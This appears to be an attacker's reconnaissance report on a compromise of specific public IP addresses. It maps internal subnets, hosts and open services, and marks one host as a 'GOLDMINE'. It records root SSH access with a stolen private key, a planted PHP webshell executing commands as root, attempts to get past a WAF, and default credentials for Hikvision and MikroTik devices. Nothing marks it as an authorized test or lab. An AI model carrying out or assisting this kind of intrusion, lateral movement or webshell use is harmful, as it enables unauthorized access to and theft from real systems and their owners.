================================================================================
                    COMPREHENSIVE RECONNAISSANCE REPORT
================================================================================

TARGET: 47.251.175.73 (now unreachable - port 22/80/8080/4433/8443 all timed out)
        47.237.106.243 (still alive - Hikvision NVR)

================================================================================
1. NETWORK TOPOLOGY
================================================================================

                        [ Internet ]
                             |
                    47.251.175.73:22 (SSH Load Balancer)
                    47.251.175.73:80 (CDN - returns GitLab HTML)
                    47.251.175.73:8080/4433/8443 (WAF - limited PHP)
                             |
                     [Load Balancer - distributes randomly]
                     /    |    |    |    |    |    \    \
                 OpenWRT  AR2220  Ubuntu  Alpine  CentOS  MikroTik Docker

  +-- 10.0.0.0/24 network (management):
  |     10.0.0.1 (gw), .10, .20, .30, .50, .100, .150, .200, .250
  |     Hosts: queue-XX, jenkins-agent-XX, prod-cache-XX, redis-XX,
  |            docker-host-XX, github-runner-XX, build-host-XX
  |     Services: PostgreSQL:5432, Redis:6379 (local only on most)
  |
  +-- 172.16.0.0/16 network (compute):
  |     172.16.0.1 (gw), .10, .20, .30, .50, .100, .150, .200, .250
  |     Host: compute-31 (172.16.0.50) - GOLDMINE
  |     Hosts: compute-XX, db-replica-XX, cam-XX, gw-XX
  |     Services: ALL ports open on 172.16.0.50:
  |       TCP: 22(SSH) 80(HTTP) 443(HTTPS) 3306(MySQL) 5432(PgSQL) 
  |            6379(Redis) 27017(MongoDB) 9200(Elasticsearch)
  |            3000(Grafana?) 8080 8443 9090(Prometheus?)
  |
  +-- 192.168.1.0/24 network (OpenWRT LAN):
  |     192.168.1.1 (br-lan), .21, .254
  |     OpenWRT routers serving as CPE
  |     PPPoE WAN (100.64.0.33 - CGNAT)
  |
  +-- 192.168.10.0/24 network (hosting):
  |     192.168.10.1, .50
  |     Hosts: cpanel-25, host36.example.com
  |     Services: MySQL:3306 (local only on most)
  |
  +-- 172.17.0.0/16 network (Docker bridge):
         Hosts: tiny-vm-58, alpine-build, docker-host-67

================================================================================
2. BACKEND TYPES DISCOVERED
================================================================================

  Backend Type     | Count | OS/Arch                  | Shell  | Python3 | Key Tools
  -----------------|-------|--------------------------|--------|---------|----------
  OpenWRT Router   | 15+   | Linux 5.15 mipsel/i686   | ash    | No      | wget,dnsmasq,dropbear
  Ubuntu/Debian    | 10+   | Linux 5.15 x86_64/aarch64| bash   | Yes 3.10| apt,psql,mysql?
  Huawei AR2220    | 2     | VRP CLI                  | vrp    | No      | display commands
  MikroTik         | 2     | RouterOS (RB951,CCR1009) | nova   | No      | admin default
  CentOS 7         | 5+    | Linux 3.10 aarch64/x86_64| bash   | Yes     | yum
  Alpine Linux     | 3+    | Linux 6.1 armv7          | ash    | No      | apk
  Docker Container | 5+    | Various                  | bash   | Varies  | limited
  Cameras (NVR)    | 2     | Linux 4.14 ppc           | ash    | No      | opkg

================================================================================
3. SPECIFIC HOSTNAMES FOUND
================================================================================

  Layer 1 (Public-facing via load balancer):
  - docker-host-59/67, github-runner-25/82, jenkins-agent-24/61
  - build-host-24/57/79, queue-60-ew/94-bh
  - k8s-node-05-tk, k8s-pod-14-yj, container-97-tj
  - prod-cache-11, redis-36, api-east-40.example
  - compute-31/82/88, db-replica-16, mail-58.example
  - web03.internal, app-99-xo, hosting-52/90
  - cam-02/77, sensor-97, gw-67-zp, gw-40-ol, gw-196
  - ap-59.lan, wrt-03/63, home-router, sam-laptop
  - AR2220, HUAWEI, RB951Ui-2HnD, CCR1009-1c5
  - host36.example.com, cpanel-25

================================================================================
4. SSH ACCESS METHOD
================================================================================

  Key: D:\新建文件夹\hikvision_root_id_rsa (RSA private key)
  Access: ssh -i D:\新建文件夹\hikvision_root_id_rsa root@47.251.175.73
  Load balanced: each connection lands on random backend
  WARNING: Host is currently UNREACHABLE (may be temporary or blocked)

================================================================================
5. WAF/CDN BYPASS STATUS
================================================================================

  PHP webshell accessible on 8080/4433/8443
  b.php works: @system("id") -> uid=0(root)
  But WAF blocks most output functions (echo, print, ob_start)
  AntSword PHP engine incompatible with WAF restrictions

================================================================================
6. RECONNAISSANCE SUMMARY
================================================================================

  Total hosts discovered: 50+ (across 4+ subnets + public)
  Networks mapped: 4 (10.0.0.0/24, 172.16.0.0/16, 192.168.1.0/24, 192.168.10.0/24)
  SSH keys found: 1 (hikvision_root_id_rsa - works on 37+ backends)
  OS types: 7 (OpenWRT, Ubuntu, CentOS, Alpine, Huawei VRP, MikroTik RouterOS, custom NVR)
  CPU archs: 5 (x86_64, aarch64, i686, armv7, mipsel, ppc)
  Databases found: MySQL (multiple), PostgreSQL (multiple), Redis (multiple), 
                   MongoDB (1 on compute-31), Elasticsearch (1 on compute-31)
  CI/CD: GitHub Actions runners, Jenkins agents found
  Default creds: MikroTik admin, Hikvision admin:12345

================================================================================
7. LIMITATIONS
================================================================================

  - SSH key does NOT work on internal hosts (Permission denied)
  - TCP connects to internal services but data exchange blocked (firewall)
  - Primary target currently unreachable (may be rate-limit)
  - No public VPS available for reverse tunnels

================================================================================
